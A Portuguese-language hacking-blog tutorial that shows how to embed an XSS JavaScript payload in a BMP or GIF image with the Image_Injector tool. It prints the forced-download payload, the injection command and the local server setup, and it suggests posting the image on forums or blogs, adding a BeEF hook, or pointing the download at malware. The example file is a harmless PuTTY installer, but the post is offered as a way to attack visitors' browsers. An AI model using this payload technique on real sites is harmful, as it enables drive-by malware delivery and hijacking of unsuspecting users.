Explot XSS com uma Imagem: Forçar o download - Anonymous Hacker

[Latest News][10]

Adobe
Análise de Vulnerabilidade
ANDROID
ANONYMOUS
Anti Vírus
ANTI-DDOS
ANTI-SPYWARES E ADWARES
Antivírus
APK PRO
APOSTILAS
apps
Ativador
CIÊNCIA
Compartilhadores
Computador pc
CURSO PHP
CURSO TCP / IP
CURSOS
Cursos Diversos
CYBORG
CYBORG FALÇÃO
DDOS
DEEPWEB
Desenvolvimento Web
DICAS
Diversos
DOCUMENTARIO
DoS
Editor de Áudio
Editor de Imagem
Editor de Texto
Editor de Vídeo
Engenharia
EXPLOIT
FACEBOOK
Ferramentas de rede
FORENSE DIGITAL
Fundamentos financeiros
Gravadores
Internet
INVASÕES
IPHONE
JOGOS
KALI LINUX
Limpeza e Utilitários
Lixão
MAC OS
macOS
Malware
Manutenção de Pcs
MySQL
NOTÍCIAS
PAGINA FAKE
PHP SCRIPT
Produtividade
Programa De Invasao
PROGRAMAÇÃO
PROGRAMAS
PROXY
SCRIPTS
SEGURANÇA
Seo
SHELL
SISTEMA OPERACIONAL
TÉCNICA DE INVASÃO
Termux
tools
Utilitários
VIDEOS
VPN
WHATSAPP
WINDOWS
Wireless Attacks
z=

Explot XSS com uma Imagem: Forçar o download

Bem-vindo hoje falamos sobre Injetar algum código XSS malicioso em uma imagem.
Nós estaremos usando o Kali Linux para este tutorial, porém você pode usar um sistema operacional de sua escolha. Recomendamos usar o Linux. Se você ainda não possui Linux, pode baixar o Kali Linux a partir daqui .
O Cross Site Scripting é uma das vulnerabilidades mais comuns e poderosas na Web. O cross-site scripting attack é um ataque em aplicativos da web e software de navegador que pode permitir que um hacker injete scripts mal-intencionados para executar ações mal-intencionadas. O script malicioso é executado no lado do navegador, o que torna esse ataque muito poderoso, sigiloso e crítico.
Digamos que queríamos injetar uma carga útil Java Script diretamente em uma imagem, como conseguimos isso?
Então, sabemos que o operador do sistema / webmaster de uma plataforma permite a execução de scripts Java do mesmo domínio. O editor WYSIWYG permite a escrita de código HTML e o download de imagens. Um hacker poderia então criar um script Java Script malicioso e injetá-lo em uma imagem, ou criar uma imagem com uma carga útil injetada.
Neste tutorial, estaremos usando uma ferramenta Python chamada Image_Injector se você ainda não tiver Image_Injector, baixe-a do link abaixo.
DOWNLOAD IMAGE_INJECTOR
[sociallocker id = "968"] https://github.com/re4lity/Image_Injector [/ sociallocker]
Neste tutorial, vou injetar algum código XSS diretamente em uma imagem BMP, você também pode usar uma imagem Gif, se desejar.
Faça o download de uma imagem GIF ou BMP de sua escolha neste tutorial, usaremos uma imagem BMP.
Estarei usando um XSS Payload para forçar um usuário a baixar um arquivo de um local externo.
Exemplo de Java Payload do Script.
var link = document.createElement ('a');
link.href = 'https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.68-installer.msi'; '
link.download = '';
document.body.appendChild (link);
link.click ();
Este script de paz de Java cria uma âncora de HTML (marca <a>) que aponta para o arquivo a ser baixado (uma imagem no script de exemplo). Em seguida, a função click () do objeto "link".
Agora, precisamos injetar nossa carga útil do Java Script XSS na imagem BMP ou Gif, abra um novo terminal e navegue até o local de download do Script Image_Injector.
Injetor de imagem inclui dois scripts Bmp Inejctor e Gif Injector as opções são iguais para ambos os scripts.
imagem-injetor-1
Para começar, usaremos um dos seguintes comandos para executar o script e injetar o nosso Script Java. Se você precisar de ajuda, você pode usar a opção -h para listar as opções disponíveis.
Uso: gif_injector.py [-h] [-i] nome do arquivo js_payload
Uso: bmp_injector.py [-h] [-i] nome do arquivo js_payload
Exemplo: meu comando parece assim.
python bmp_injector.py -i bmp-128.bmp "var link = document.createElement ('a');
 link.href = 'https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.68-installer.msi';
 link.download = '';
 document.body.appendChild (link);
 link.click (); "

imagem-injetor-2
Iniciamos a nossa carga útil Java Script na imagem. Podemos encontrar o arquivo de saída no diretório do script. Também verá um modelo de script HTML do seu gif ou bmp gerado no diretório do script.
Se olharmos dentro do script HTML gerado, você poderá ver um modelo gerado para uso com a imagem injetada.
Agora vamos copiar o conteúdo do diretório do script e colocá-lo no diretório / var / www /.
Execute serviços apache2 usando o seguinte comando.
service apache2 start
Isso iniciará um servidor web Apache.
Agora, abra um novo navegador e execute a página HTML. Navegue para o seu endereço de IP local 127.0.0.1.
Agora você pode ver uma notificação de alerta de script Java no seu navegador, solicitando que você baixe um arquivo.
Agora vamos imaginar que possamos explorar o XSS com uma imagem? Podemos inseri-lo como um comentário? em um fórum, blog ou aplicativo da Web ou mesmo integrar a imagem GIF / Bmp maliciosa com um gancho BEeF ou de uma estrutura semelhante ... Os resultados podem ser devastadores.
Neste tutorial usamos um arquivo de download não mal-intencionado chamado Putty para usar como exemplo. Se um hacker incluísse um local de download para um malware ou vírus mal-intencionado, um invasor poderia então realizar novos ataques.

Sobre

trabalho com segurança da informação a 13 anos, grande parte desse tempo como professor. Fiz meu bacharelado em ciência da computação, especialização em segurança da informação e logo após, mestrado em ciência da informação.

Nenhum comentário:

Postar um comentário

FECHAR ADS

Start typing and press Enter to search